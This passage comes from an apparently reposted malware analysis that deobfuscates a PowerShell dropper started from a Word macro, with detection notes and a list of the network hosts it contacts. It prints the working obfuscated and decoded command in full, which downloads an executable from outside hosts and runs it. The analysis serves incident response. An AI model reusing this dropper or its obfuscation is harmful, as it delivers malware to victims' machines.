iMP)').rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),'|').rePLaCE('IdQ',[sTriNG][ChAR]36).rePLaCE('iMP',[sTriNG][ChAR]39) ) )
# Layer 5 - after vGA / IdQ / iMP substitution.  The payload is now a single
# '+'-joined literal followed by the last set of placeholder replacements:
#   'Y4E' ([char]89+52+69) -> '      'W2K' -> "      'jPI' -> \
#   '4Yo' ([char]52+89+111) -> $     'vLd' ([char]118+76+100) -> `
# The result is piped to & ($shellid[1]+$shellid[13]+'X').  $ShellId is
# "Microsoft.PowerShell", so [1]='i' and [13]='e' give 'ieX' - the fourth
# Invoke-Expression in the chain, once more without the literal token present.
ieX(  .ieX .ieX (('4Yo'+'ns'+'a'+'dasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-o'+'bje'+'cY4E'+'+Y4EtY'+'4E'+') random;4Yo'+'YY'+'U'+' ='+' .(Y4En'+'e
Y4E+'+'Y4EwY4'+'E+Y4E-'+'objectY'+'4E)'+' Sys'+'tem'+'.Net.'+'WebC'+'lient;4YoN'+'SB'+' ='+' 4'+'Yonsada'+'sd.next'+'(1
0000, 2'+'82133)'+';4YoA'+'D'+'C'+'X = '+'Y4E'+' '+'ht'+'tp:/'+'/'+'www.elosduvale.'+'com'+'.b'+'r/OUFW/?'+'http:'+'/'+
'/'+'d'+'u'+'lfac'+'ollt'+'da'+'.'+'c'+'om/rL'+'7zkpa/'+'?http://j'+'ati.'+'c'+'o'+'m'+'.au/k'+'R'+'BGS7/?'+'htt'+'ps:/
/www.blueyachtch'+'arter.com/D'+'IjVX4U'+'/?http://re'+'viewzaap.a'+'zurew'+'ebsites'+'.net/oMgoZ/Y4'+'E.'+'Split('+'Y4
E?Y4E);4Y'+'oSDC'+' '+'= 4Y'+'o'+'en'+'v:publi'+'c + '+'Y4'+'E'+'jPIY4E +'+' 4YoN'+'S'+'B '+'+ (Y4E.e'+'xY4E+Y4EeY'+'4E
)'+';'+'f'+'orea'+'c'+'h'+'(4Yoa'+'sfc in'+' 4YoAD'+'CX'+'){t'+'ry'+'{4YoYYU.W2KDovLdW'+'nlvLd'+'OadFIvLdl'+'e'+'W'+'2K
(4Y'+'o'+'asfc'+'.W2'+'K'+'T'+'oStrvLdivLdNgW2K()'+', 4YoSD'+'C);&'+'(Y4E'+'Invo'+'Y4E'+'+Y4EkY4'+'E'+'+Y4E'+'e-I'+'te'
+'mY'+'4E)(4YoSDC)'+';break;'+'}catch{}}')  -rEpLace ([Char]89+[Char]52+[Char]69),[Char]39 -cREPLACe'W2K',[Char]34 -rEp
Lace  'jPI',[Char]92  -cREPLACe([Char]52+[Char]89+[Char]111),[Char]36-cREPLACe([Char]118+[Char]76+[Char]100),[Char]96)|
& ( $sheLLiD[1]+$shElLiD[13]+'X') )
# Final layer - fully decoded.  What actually runs, statement by statement:
#   $nsadasd = New-Object Random             ('n'+'e'+'w-objec'+'t' is just "new-object")
#   $YYU     = New-Object System.Net.WebClient
#   $NSB     = $nsadasd.Next(10000, 282133)  random integer, used as the dropped file name
#   $ADCX    = '<5 URLs>'.Split('?')         the URLs are joined with "/?" so the split
#                                            yields one URL per element (the first keeps a
#                                            leading space; .NET Uri parsing appears to
#                                            tolerate it - verify before relying on that)
#   $SDC     = $env:public + '\' + $NSB + '.exe'   typically C:\Users\Public\<random>.exe
#   foreach URL: $YYU.DownloadFile(url, $SDC); Invoke-Item $SDC; break
# The backtick-split method names ("Do`Wnl`OadFI`le", "ToStr`i`Ng") are just
# PowerShell escape noise and resolve to DownloadFile / ToString; 'Invo'+'k'+'e-Item'
# is Invoke-Item, i.e. the downloaded file is opened/executed.  Each attempt is
# wrapped in try{}catch{}: a dead host is skipped silently, the first host that
# answers wins, and "break" stops the loop after one successful download, so
# exactly one binary is dropped.  $shellid[1]+$shellid[13]+'X' is "ieX"
# ("Microsoft.PowerShell"[1]='i', [13]='e').
# Detection / IR notes grounded in this chain: the expected process tree is
# WINWORD.EXE -> cmd.exe -> cmd.exe (%ComSpec% /V /c) -> powershell.exe; the
# PowerShell command line contains [Char] arithmetic, -join and -replace string
# building rather than the word "iex"; a randomly named .exe appears under
# %PUBLIC%; and outbound HTTP(S) goes to the five hosts in the IoC list below.
ieX(  .ieX .ieX ($nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000
, 282133);$ADCX = ' http://www.elosduvale.com.br/OUFW/?http://dulfacolltda.com/rL7zkpa/?http://jati.com.au/kRBGS7/?http
s://www.blueyachtcharter.com/DIjVX4U/?http://reviewzaap.azurewebsites.net/oMgoZ/'.Split('?');$SDC = $env:public + '\' +
 $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item
')($SDC);break;}catch{}} |& ( $sheLLiD[1]+$shElLiD[13]+'X') )

Network IoCs（脚本按下面的顺序逐个尝试下载，任意一个成功即停止；落地文件为 %PUBLIC%\<10000–282132 之间的随机数>.exe，下载后立即用 Invoke-Item 执行）：

http://www.elosduvale.com.br/OUFW/
http://dulfacolltda.com/rL7zkpa/
http://jati.com.au/kRBGS7/
https://www.blueyachtcharter.com/DIjVX4U/
http://reviewzaap.azurewebsites.net/oMgoZ/

转载于:https://www.cnblogs.com/xiaoxiaoleo/p/8578567.html
